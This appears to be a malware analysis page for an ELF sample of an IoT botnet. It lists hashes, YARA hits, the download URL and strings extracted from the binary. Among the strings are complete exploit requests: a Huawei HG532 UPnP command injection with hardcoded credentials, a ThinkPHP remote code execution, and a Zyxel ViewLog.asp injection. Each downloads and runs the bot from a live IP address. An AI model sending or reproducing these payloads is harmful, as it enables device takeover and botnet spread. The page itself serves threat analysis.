Sample details: a42a43d60a1e45fa72e7a7e924efd96d

Hashes
MD5: a42a43d60a1e45fa72e7a7e924efd96d
SHA1: e6fb0bd593bd09685454431ac6baaeef3b57923c
SHA256: 6abbd285b112542f9cbdc982c603f16d1009fea3afeb3159fb7cbef946b2223b
SSDEEP: 1536:EiqvoMDZVZWJpqZhPOnAiHhwt2/mYWgaX+tSYK1Kf5Pj3Qp:EiqvoMdVZWJpqzPchhk2/mYPautE1Kf2
Details
File Type: ELF
Added: 2019-06-20 00:06:00
YARA Hits
YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1
Source
http://107.174.14.79/bins/UnHAnaAW.x86
Strings
		PTRh&c
D$ j@j
\$H9\$
D$$j@j
;|$(t:PPj
;|$(t:PPj
D$(j@j
D$ j@j
< t <	t
C)QQWP
D$ JR**
D$(XZj
D$(_]j
f;D$4u
9D$ t'
f;D$@u
f;D$4u
;T$(}Q
D$$PSV
f;D$4u
xAPPSh
\$0PPj
D$,PhD
}/C;T$
u%WWSS
PPShxm
t@;D$xu
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 107.174.14.79 -l /tmp/binary -r /bins/UnHAnaAW.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Selfrep.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
107.174.14.79
<!: acam
 18:1 
0125!8 
$5''#;&0
'!$$;& 
?;d509=:
:217 10t
'<188T
1:5681T
'-' 19T
{6=:{6!'-6;,t
nt5$$81 t:; t2;!:0T
:7;&&17 T
{6=:{6!'-6;,t$'T
{6=:{6!'-6;,t?=88tymtT
{$&;7{T
{95$'T
{$&;7{:1 { 7$T
{' 5 !'T
z5:=91T
{$&;7{:1 {&;! 1T
5''#;&0T
{1 7{&1';8"z7;:2T
:591'1&"1&tT
{01"{#5 7<0;3T
{01"{9='7{#5 7<0;3T
$662*7!E
1: 1&T
e365`70;9ag:<$ef1=d?2>T
;!&71t
:3=:1t
GET /index.php?s=/index/	hink
pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://107.174.14.79/bins/UnHAnaAW.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Uirusu/2.0
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
 /bin/busybox wget http://107.174.14.79/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
/dev/null
.shstrtab
.rodata
.ctors
.dtors